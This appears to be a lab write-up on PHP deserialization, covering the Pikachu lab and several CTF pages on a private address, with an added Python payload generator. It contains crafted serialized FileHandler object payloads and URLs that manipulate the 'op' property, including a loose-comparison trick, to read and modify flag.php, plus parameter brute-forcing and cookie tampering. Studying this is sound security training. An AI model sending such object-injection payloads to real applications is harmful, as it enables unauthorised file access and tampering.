Published: 2023-08-26 15:00
Pikachu deserialization
serialize() // converts an object (or any value) into a string
unserialize() // restores that string back into an object (or value)
Trigger conditions: the input to unserialize() is attacker-controlled, the loaded code contains a usable class, and that class defines magic methods:
__construct() // triggered when an object is created with new
__destruct() // triggered when the object is destroyed
__call() // triggered when an inaccessible method is called in object context
__callStatic() // triggered when an inaccessible method is called in static context
__get() // reads data from an inaccessible property
__set() // writes data to an inaccessible property
__isset() // triggered by isset() or empty() on an inaccessible property
__unset() // triggered by unset() on an inaccessible property
__invoke() // triggered when the script tries to call the object as a function
Note: unserialize() does not call __construct() on the object it rebuilds; it calls __wakeup() instead, and __destruct() runs when that object is later destroyed. Those are the methods that actually fire on attacker-supplied serialized data. The snippets below use __construct() only to show what serialize() produces for an object.
Online PHP runner used to generate the payloads below: https://c.runoob.com/compile/1/
Serialization:
<?php
$a = 'abc';
echo serialize($a);
?>
Output: s:3:"abc";
Deserialization:
<?php
$b = 's:3:"abc";';
echo unserialize($b);
?>
Output: abc
<?php
class S {
    var $test = "pikachu";
    function __construct() {
        echo $this->test; // runs on new S(), not on unserialize()
    }
}
$aa = new S();
echo serialize($aa);
?>
Output (the constructor's echo followed by the serialized object): pikachuO:1:"S":1:{s:4:"test";s:7:"pikachu";}
Serialization
<?php
class MM {
    var $test = "pikachu";
    function __construct() {
        echo "hello world";
    }
}
$sss = new MM();
echo serialize($sss);
?>
Output: hello worldO:2:"MM":1:{s:4:"test";s:7:"pikachu";}
Input: O:1:"S":1:{s:4:"test";s:29:"";} (the 29-byte value of test is missing from this copy; as written, the declared length does not match the empty body, so unserialize() returns false)
Input: O:1:"S":1:{s:4:"test";s:7:"pikachu";}
CTF exercise
Visit http://192.168.249.1/ctf/ctf.php
Serialization
<?php
$KEY = "hahaha";
echo serialize($KEY);
?>
Output: s:6:"hahaha";
http://192.168.249.1/ctf/ctf.php?str=s:6:%22hahaha%22; deserialization succeeds
Visit http://192.168.249.1/ctf2/ctf2.php
Visit http://192.168.249.1/ctf2/ctf2.php?aaa=111 through the proxy and capture the request
Send the request to Intruder to brute-force the parameter name
Use the "4 letter words" payload list
The brute force turns up the parameter hint
Visit http://192.168.249.1/ctf2/ctf2.php?hint=111
Response: s:21:"ISecer:www.isecer.com";
Add a cookie
Visit http://192.168.249.1/ctf2/ctf2.php
s:0:""; an empty string is deserialized
Change the value of the ISecer cookie
Visit http://192.168.249.1/ctf2/ctf2.php
Visit http://192.168.249.1/ctf3/
s:5:"11111"; is the serialized value
Visit http://192.168.249.1/ctf3/?str=s:5:%2211111%22; deserializes correctly
Visit http://192.168.249.1/ctf3/?str=111 a bare number fails: it is not valid serialized data (an integer would be i:111;), so unserialize() returns false
<?php
class FileHandler {
    public $op = '1';
    public $filename = 'flag.php';
    public $content = 'Hello World!';
}
$aaa = new FileHandler();
echo serialize($aaa);
?>
Result:
O:11:"FileHandler":3:{s:2:"op";s:1:"1";s:8:"filename";s:8:"flag.php";s:7:"content";s:12:"Hello World!";}
Visit with str set to (op changed to 4): O:11:"FileHandler":3:{s:2:"op";s:1:"4";s:8:"filename";s:8:"flag.php";s:7:"content";s:12:"Hello World!";}
http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:1:%224%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:12:%22Hello%20World!%22;}
Visit with str set to (op = 1): O:11:"FileHandler":3:{s:2:"op";s:1:"1";s:8:"filename";s:8:"flag.php";s:7:"content";s:12:"Hello World!";}
http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:1:%221%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:12:%22Hello%20World!%22;}
<?php
class FileHandler {
    public $op = ' 2';        // leading space: " 2" == "2" is true in PHP, " 2" === "2" is false
    public $filename = 'flag.php';
    public $content = '';
}
$aaa = new FileHandler();
echo serialize($aaa);
?>
Result: O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}
Switch version
Visit http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:2:%22%202%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:0:%22%22;}
Modify flag.php
Visit http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:2:%22%202%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:0:%22%22;}
Modify index.php
Visit again
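The serialized-string format used throughout (s:<byte length>:"...";, O:<len>:"Class":<property count>:{...}) and the FileHandler payloads above are simple enough to generate and check without a PHP interpreter or the online runner. The Python below is an added example, not code from the original post or from the Pikachu/CTF labs: a minimal serialize()/unserialize() for the value types that appear on this page, a FileHandler payload builder, and the URL encoding for the ?str= parameter. The class name, property names and lab URL are taken from this page; the decoder's behaviour on the broken s:29:"" payload and on a bare 111 mirrors why those inputs fail in PHP (declared length does not match the body; no type tag). The " 2" value is generated as shown on the page; the usual reason for the leading space (loose == treats " 2" as 2 while strict === does not) is an assumption about the target, since the lab's checking code is not shown here.

```python
"""Added example: minimal PHP serialize()/unserialize() for building and checking
the payloads on this page. Not part of the original post or the Pikachu lab."""
from urllib.parse import quote

# Lab endpoint as given on this page (constructed for the example).
CTF3_URL = "http://192.168.249.1/ctf3/?str="


def php_serialize(value):
    """Serialize None, bool, int, str, or an object given as (class_name, {prop: value})."""
    if value is None:
        return "N;"
    if isinstance(value, bool):            # must come before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP counts bytes, not characters: s:<byte length>:"<raw bytes>";
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, tuple) and len(value) == 2:
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return f'O:{len(cls.encode())}:"{cls}":{len(props)}:{{{body}}}'
    raise TypeError(f"unsupported type: {type(value).__name__}")


class _Parser:
    """Recursive-descent reader over the raw bytes; raises ValueError on any malformed input."""

    def __init__(self, data: bytes):
        self.d, self.i = data, 0

    def _expect(self, lit: bytes):
        if not self.d.startswith(lit, self.i):
            raise ValueError(f"expected {lit!r} at offset {self.i}")
        self.i += len(lit)

    def _int(self, term: bytes) -> int:
        end = self.d.index(term, self.i)      # ValueError if the terminator is missing
        n = int(self.d[self.i:end])           # ValueError if not a decimal integer
        self.i = end + len(term)
        return n

    def value(self):
        tag = self.d[self.i:self.i + 1]
        if tag == b"N":
            self._expect(b"N;")
            return None
        if tag == b"b":
            self._expect(b"b:")
            return self._int(b";") == 1
        if tag == b"i":
            self._expect(b"i:")
            return self._int(b";")
        if tag == b"s":
            self._expect(b"s:")
            n = self._int(b':"')
            raw = self.d[self.i:self.i + n]
            if len(raw) != n:                 # declared length runs past the end of the data
                raise ValueError("string body shorter than declared length")
            self.i += n
            self._expect(b'";')               # also catches a declared length that is too short
            return raw.decode()
        if tag == b"O":
            self._expect(b"O:")
            n = self._int(b':"')
            cls = self.d[self.i:self.i + n].decode()
            self.i += n
            self._expect(b'":')
            count = self._int(b":{")
            props = {}
            for _ in range(count):            # each property is a serialized name then a value
                name = self.value()
                props[name] = self.value()
            self._expect(b"}")
            return (cls, props)
        raise ValueError(f"unknown type tag {tag!r} at offset {self.i}")


def php_unserialize(data: bytes):
    """Decoded value, or None when the input is malformed (where PHP returns false)."""
    try:
        return _Parser(data).value()
    except ValueError:
        return None


def file_handler_payload(op: str, filename: str = "flag.php", content: str = "") -> str:
    """Serialized FileHandler with the three public properties used in the ctf3 lab."""
    return php_serialize(("FileHandler", {"op": op, "filename": filename, "content": content}))


def ctf3_url(op: str) -> str:
    """Full ?str= URL; only the quotes and spaces in the payload need percent-encoding."""
    return CTF3_URL + quote(file_handler_payload(op), safe=":;{}")


if __name__ == "__main__":
    print(file_handler_payload("1", content="Hello World!"))
    print(ctf3_url(" 2"))
    print(php_unserialize(b'O:1:"S":1:{s:4:"test";s:29:"";}'))   # None: length mismatch
```

Like PHP's unserialize(), which returns false both for failure and for a serialized false (b:0;), php_unserialize() returns None both for malformed input and for a serialized null (N;); call _Parser(...).value() directly when that distinction matters.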